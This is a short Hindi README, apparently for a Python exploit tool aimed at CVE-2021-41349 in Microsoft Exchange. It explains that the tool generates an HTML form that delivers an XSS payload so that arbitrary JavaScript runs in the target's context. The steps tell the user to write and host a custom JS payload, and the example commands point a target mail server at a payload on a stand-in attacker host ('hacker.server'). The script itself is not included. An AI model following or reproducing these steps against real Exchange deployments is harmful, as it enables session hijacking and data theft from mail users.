
CVE-2021-41349 के लिए एक्सप्लॉइट टूल जो Microsoft Exchange सर्वरों पर XSS पेलोड पहुंचाने के लिए एक HTML फॉर्म उत्पन्न करता है, जिससे मनमाना JavaScript निष्पादन संभव होता है।
एक्सप्लॉइटिंग: CVE-2021-41349
यह एक्सप्लॉइटिंग टूल लक्षित Exchange सर्वर पर XSS पेलोड पोस्ट करने के लिए एक फॉर्म बनाता है।
आपको अपनी इच्छा के अनुसार एक js बनाना होगा।
js पेलोड बनाएं और इसे कहीं अपलोड करें।CVE-2021-41349.py को निम्नलिखित चरणों के अनुसार चलाएं।python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
या:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html फ़ाइल को सर्वर पर अपलोड करें।